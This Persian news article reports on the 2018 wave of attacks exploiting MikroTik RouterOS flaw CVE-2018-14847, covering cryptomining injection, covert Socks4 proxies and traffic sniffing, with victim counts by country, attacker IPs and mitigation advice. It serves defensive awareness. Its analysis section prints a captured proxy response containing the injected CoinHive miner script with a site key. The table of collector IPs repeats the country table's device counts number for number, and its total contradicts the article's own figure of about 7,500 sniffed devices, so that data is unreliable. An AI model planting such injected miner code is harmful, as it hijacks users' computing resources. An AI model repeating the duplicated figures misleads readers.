روترهای میکروتیک اطلاعات کاربران را به مهاجمان ارسال می‌کنند

پنج‌شنبه ۲۲ شهریور ۱۳۹۷ - ۱۱:۰۵
مطالعه 6 دقیقه
متخصصان امنیت به‌تازگی دریافته‌اند که بسیاری از اطلاعات روترهای میکروتیک شنود می‌شوند. IPهای ایرانی نیز در میان لیست شنودشدگان قرار دارند. با ما همراه باشید تا از جزئیات بیشتر و روش‌های مقابله با این شنودها آگاه شوید.
تبلیغات

بررسی کلی

شرکت لتونیایی میکروتیک (MikroTik)، در سال ۱۹۹۶ برای توسعه روترها و سیستم‌های بی‌سیم ISP تأسیس شد. میکروتیک هم‌اکنون در سرتاسر جهان، سخت‌افزار و نرم‌افزار اتصال به اینترنت عرضه می‌کند. در سال ۱۹۹۷، میکروتیک سیستم نرم‌افزاری RouterOS را خلق کرد. در سال ۲۰۰۲، میکروتیک تصمیم گرفت سخت‌افزار اختصاصی خود را بسازد و برند RouterBOARD را ایجاد کرد. هر دستگاه RouterBOARD، از سیستم نرم‌افزاری RouterOS بهره می‌برد.

بنابر اسناد Vault7 که WikiLeaks منتشر کرده است، ابزار هک CIA، شیمِی قرمز (Chimay Red)، از دو حفره امنیتی در (Winbox (CVE-2018-14847 و Webfig استفاده می‌کند.

Winbox و Webfig هردو از اجزای مدیریتی RouterOS اند. Winbox یک نرم‌افزار مبتنی بر ویندوز و دارای رابط گرافیکی (GUI) است؛ در حالی که Webfig مبتنی بر وب عمل می‎‌کند. پورت‌‌های مشترک این دو نرم‌افزار TCP/8291، TCP/80 و TCP/8080 هستند.

سیستم‌های هانی‌پات، طعمه‌هایی برای شناسایی و انحراف حملات سایبری و خنثی‌سازی دسترسی‌های غیرمجاز هستند. از اواسط جولای (تیر)، سیستم هانی‌پات انگلرفیش (Anglerfish Honeypot System)، بدافزاری را که از نفوذپذیری CVE-2018-14847 استفاده می‌کرد تا فعالیت‌های مخرب گسترده‌ای را اجرا کند، شناسایی کرد. محققین امنیت برخی دیگر از این قبیل فعالیت‌ها مثل تزریق کد استخراج ارز دیجیتال به روش کوین‌هایو (CoinHive) را ردیابی کرده‌ بودند.

مهاجمان بیش از ۷۵۰۰ روتر میکروتیک را شنود می‌کنند

همچنین تعداد زیادی از افراد مشاهده شده‌اند که پروکسی ساکس۴ (Socks4) بر روی دستگاهشان توسط عاملی مشکوک فعال شده‌ است.

جالب‌تر آنکه ترافیک بیش از ۷۵۰۰ نفر به آی‌پی‌هایی که توسط مهاجمان ناشناس کنترل می‌شوند، ارسال می‌شود و بدین ترتیب این افراد شنود می‌شوند.

دستگاه‌های آسیب‌پذیر

از بین ۵ میلیون دستگاه ثبت‌شده با پورت TCP/8291 باز، ۱۲۰۰۰۰۰ (یک میلیون و دویست هزار) دستگاه متعلق به میکروتیک هستند که از این بین، ۳۷۰۰۰۰ (سیصد و هفتاد هزار) دستگاه (۳۰.۸۳%) به CVE-2018-14847، آسیب‌پذیرند.

نقشه آسیب پذیری میکروتیک

نقشه گسترش آسیب‌پذیری RouterOS

کشور

تعداد دستگاه‌ها

برزیل

۴۲۳۷۶

روسیه

۴۰۷۴۲

اندونزی

۲۲۴۴۱

هند

۲۱۸۳۷

ایران

۱۹۳۳۱

ایتالیا

۱۶۵۴۳

لهستان

۱۴۳۵۷

ایالات متحده

۱۴۰۰۷

تایلند

۱۲۸۹۸

اوکراین

۱۲۷۲۰

چین

۱۱۱۲۴

اسپانیا

۱۰۸۴۲

آفریقای جنوبی

۸۷۵۸

جمهوری چک

۸۶۲۱

آرژانتین

۶۸۶۹

کلمبیا

۶۴۷۴

کامبوج

۶۱۳۴

بنگلادش

۵۵۱۲

اکوادور

۴۸۵۷

مجارستان

۴۱۶۲

بیشترین دستگاه‌های آسیب‌پذیر به تفکیک کشور

حملات

تزریق کد استخراج ارز دیجیتال به روش CoinHive

بعد از فعال‌سازی پروکسی HTTP در RouterOS، مهاجم از حقه‌ای استفاده کرده و تمامی درخواست‌های پروکسی HTTP را به یک صفحه‌ی لوکال ارور ۴۰۳ هدایت می‌کند. در این صفحه‌ی ارور، لینکی از coinhive.com برای استخراج (mining) ارز دیجیتال درج شده است. با این کار مهاجم امیدوار است تا بر روی تمامی ترافیک پروکسی دستگاه کاربر، استخراج انجام دهد.

روتر میکروتیک

نکته قابل توجه این است که کد ماینینگ به این صورت عمل نمی‌کند. تمامی منابع خارجی وب، از جمله منابع coinhive.com که برای استخراج ارز دیجیتال مورد نیاز است، توسط (ACL (Access Control Listهای پروکسی که توسط خود مهاجمان تعبیه شده‌، مسدود می‌شود.

# curl -i --proxy http://192.168.40.147:8080 http://netlab.360.comHTTP/1.0 403 Forbidden Content-Length: 418 Content-Type: text/html Date: Sat, 26 Aug 2017 03:53:43 GMT Expires: Sat, 26 Aug 2017 03:53:43 GMT Server: Mikrotik HttpProxy Proxy-Connection: close "http://netlab.360.com/" var miner = new CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2}); miner.start();

پروکسی ساکس ۴ و 95.154.216.128/25 اسرارآمیز

در حال حاضر، پروکسی ساکس ۴ بر روی ۲۳۹ هزار دستگاه به‌طور مشکوکی فعال است. ساکس ۴ معمولاً از پورت TCP/4153 استفاده می‌کند. تنظیمات پروکسی ساکس ۴ فقط اجازه اتصال از آی‌پی‌های 95.154.216.128/25 را می‌دهد. مهاجمان برای به‌دست‌آوردن مجدد کنترل بعد از ریبوت دستگاه (تغییر آی‌پی)، دستگاه را طوری تنظیم می‌کنند تا به‌طور زمان‌بندی‌شده آخرین آی‌پی را با اتصال به آدرس (URL) مخصوص مهاجم گزارش کند.

همچنین مهاجم با استفاده از این پروکسی ساکس۴ آسیب‌پذیر، به‌دنبال دستگاه‌های RouterOS بیشتری می‌گردد.

هم‌اکنون، تمامی ۲۳۹ هزار دستگاه فقط اجازه دسترسی از 95.154.216.128/25 (غالباً 95.154.216.167) را می‌دهند. پی بردن به قصد مهاجمان از این تعداد پروکسی‌ ساکس ۴ دشوار است.

روتر میکروتیک

شنود

دستگاه‌های RouterOS به کاربران اجازه می‌دهد تا بسته‌‌های (Packet) روتر را گرفته و این ترافیک را به یک سرور خاص ارسال کنند. مهاجمان، ترافیک ۷.۵ هزار دستگاه RouterOS را به یک سری IPهای جمع‌کننده ارسال می‌کنند. در بین این آی‌پی‌ها، 37.1.207.114 نقش پررنگ‌تری داشته و ترافیک قابل توجهی از دستگاه‌ها به این مقصد ارسال می‌شود.

روتر میکروتیک

مهاجمان بیشتر به پورت‌های ۲۰، ۲۱، ۲۵، ۱۱۰ و ۱۴۳ علاقه دارند. این پورت ها به FTP، SMTP، POP3 و IMAP مربوط اند. همچنین پورت‌های ۱۶۱ و ۱۶۲، که مربوط به SNMP هستند، جزو پورت‌های محبوب مهاجمان محسوب می‌شوند. سوالی که پیش می‌آید این است که چرا مهاجمان پروتکل SNMP را، که به ندرت توسط کاربران استفاده می‌شود، مورد هدف قرار داده‌اند؟ آیا آن‌ها قصد شنود اطلاعات از کاربران خاصی ‌را دارند؟ هنوز پاسخ این سوال معلوم نیست.

آی‌پی جمع‌کننده

تعداد دستگاه‌ها

37.1.207.114

۴۲۳۷۶

185.69.155.23

۴۰۷۴۲

188.127.251.61

۲۲۴۴۱

5.9.183.69

۲۱۸۳۷

77.222.54.45

۱۹۳۳۱

103.193.137.211

۱۶۵۴۳

24.255.37.1

۱۴۳۵۷

45.76.88.43

۱۴۰۰۷

206.255.37.1

۱۲۸۹۸

برترین مهاجمان

پورت

تعداد دستگاه‌ها

۲۱

۵۸۳۷

۱۴۳

۵۸۳۲

۱۱۰

۵۷۸۴

۲۰

۴۱۶۵

۲۵

۲۸۵۰

۲۳

۱۳۲۸

۱۵۰۰

۱۱۱۸

۸۰۸۳

۱۰۹۵

۳۳۳۳

۹۹۳

۵۰۰۰۱

۹۸۴

۸۵۴۵

۹۸۲

۱۶۱

۶۷۷

۱۶۲

۶۷۳

۳۳۰۶

۳۵۵

۸۰

۲۸۲

۸۰۸۰

۲۴۳

۸۰۸۱

۲۳۷

۸۰۸۲

۲۳۰

۵۳

۱۶۸

۲۰۴۸

۱۶۷

پورت‌های شنود شده

کشور

تعداد IPها

روسیه

۱۶۲۸

ایران

۶۳۷

برزیل

۶۱۵

هند

۵۹۴

اوکراین

۵۴۴

بنگلادش

۳۷۵

اندونزی

۳۶۴

اکوادور

۲۱۸

ایالات متحده

۱۹۱

آرژانتین

۱۸۹

کلمبیا

۱۲۲

لهستان

۱۱۳

کنیا

۱۰۶

عراق

۱۰۰

اتریش

۹۲

اقیانوسیه

۹۲

بلغارستان

۸۵

اسپانیا

۸۴

ایتالیا

۶۹

آفریقای جنوبی

۶۳

جمهوری چک

۶۲

صربستان

۵۹

آلمان

۵۶

آلبانی

۵۲

نیجریه

۵۰

چین

۴۷

هلند

۳۹

ترکیه

۳۸

کامبوج

۳۷

پاکستان

۳۲

انگلستان

۳۰

اتحادیه اروپا

۲۹

آمریکای لاتین

۲۶

شیلی

۲۵

مکزیک

۲۴

مجارستان

۲۲

نیکاراگوئه

۲۰

رومانی

۱۹

تایلند

۱۸

پاراگوئه

۱۶

تعداد قربانیان به تفکیک کشور

پیش‌گیری و مقابله

پیشنهاد می‌شود که کاربران RouterOS سیستم نرم‌افزاری خود را به‌طور منظم به‌روزرسانی کنند. همچنین بررسی کنند که پروکسی HTTP، پروکسی ساکس ۴ و ترافیک شبکه، مورد سوءاستفاده قرار نمی‌گیرد.

از میکروتیک انتظار می‌رود تا عدم اجازه دسترسی ورودی از اینترنت به Webfig و Winbox و بهبود سازوکار به‌روزرسانی‌های امنیتی را در دستور کار خود قرار دهد.

اطلاعات مهاجمان

نام

IP

AS50673 Serverius Holding B.V.

37.1.207.114

AS200000 Hosting Ukraine LTD

185.69.155.23

AS56694 Telecommunication Systems, LLC

188.127.251.61

AS24940 Hetzner Online GmbH

5.9.183.69

AS44112 SpaceWeb Ltd

77.222.54.45

AS22773 Cox Communications Inc.

24.255.37.1

AS20473 Choopa, LLC

45.76.88.43

AS53508 Cablelynx

206.255.37.1

AS20860 iomart Cloud Services Limited.

95.154.216.167

لیست مهاجمان

با توجه به حضور قابل توجه IPهای ایرانی در میان دستگاه‌های آسیب‌پذیر و شنودشده پیشنهاد می‌کنیم اگر از دستگاه‌های میکروتیک مجهز به RouterOS استفاده می‌کنید، هرچه سریع‌تر موارد اشاره‌شده در بخش پیش‌گیری و مقابله را بررسی کنید.

نظر شما در این رابطه چیست؟ آیا شما از دستگاه‌های میکروتیک استفاده می‌کنید؟ به نظر شما چه کسانی و با چه اهدافی در پشت این حملات هستند؟ دیدگاه‌های خود را با ما در میان بگذارید.

مقاله رو دوست داشتی؟
نظرت چیه؟
داغ‌ترین مطالب روز
تبلیغات

نظرات